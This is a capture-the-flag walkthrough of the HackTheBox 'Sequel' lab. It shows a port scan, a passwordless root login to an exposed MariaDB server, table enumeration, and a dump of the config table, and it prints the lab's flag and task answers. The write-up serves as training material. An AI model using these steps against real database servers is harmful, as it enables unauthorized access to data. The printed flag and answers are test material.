Sequel is a really nice challenge by HacktheBox to Practice Hacking skills. So in this writeup we are going to dive into it.
Fire up your terminal
and scan for the target like
wesecure1337@kali:~$ nmap 10.129.95.232
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 16:06 IST
Nmap scan report for 10.129.95.232
Host is up (0.44s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysqlNmap done: 1 IP address (1 host up) scanned in 54.74 seconds
From the scan results our useful information is
Host is up (0.44s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysql
If you have read our previous writeup of Appointment Starting Point
challenge the you know the solution for Task 1, else simple google sql stands for
and you will get the answer.
TASK 1What does the acronym SQL stand for?
Structured Query Language
As shown in the scan results only one port 3306
is open which is running mysql
TASK 2During our scan, which port running mysql do we find?
3306
MariaDB
is a community-developed popular MySQL version
TASK 3What community-developed MySQL version is the target running?
MariaDB
If you have mysql
installed in your system simple type mysql --help
as shown
wesecure@kali:~$ mysql --help
Your will get the entire help menu of which says
wesecure@kali:~$ mysql --help
...
-u, --user=name User for login if not current user.
...
So from here we know that the flag -u
is used to specify username.
TASK 4What switch do we need to use in order to specify a login username for the MySQL service?
-u
Using root
as username, one can login without providing any password in MariaDB
.
TASK 5Which username allows us to log into MariaDB without providing a password?
root
If you every used sql
then you know that *
is used to represent all
TASK 6What symbol can we use to specify within the query that we want to display everything inside a table?
*
;
is a very common symbol used in many languages like c, cpp, java etc
to end line similar is case with queries.
TASK 7What symbol do we need to end each query with?
;
Now we are going to exploit the mysql
Let’s connect to the database
wesecure1337@kali:~$ mysql -u root -p -h 10.129.95.232
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 73
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MariaDB [(none)]>
Here -u
specify root
as username -p
for password which is blank in this case -h
for hostname which is the ip_address
of sequel
challenge. When prompted for Enter password:
just hit Enter
you will be logged in. Follow the steps to get the flag.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.284 sec)MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.221 sec)MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.263 sec)MariaDB [htb]>
show databases;
is used to list the available databases
use htb;
is used to see set the database
to htb
show tables;
is used to see tables
inside htb
database.
select * from config;
is used to see all available data in config table.
So finally we found our flag.
SUBMIT FLAGSubmit root flag
7b4bec00d1a39e3dd4e021ec3d915da8
Voila!!! We have successfully solved Sequel Starting Point Challenge by HacktheBox. If you really enjoyed this writeup/walkthrough, then do checkout our other wirteups about related topics.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
If you want to appreciate and support my work here you go…
Thanks for Reading!!!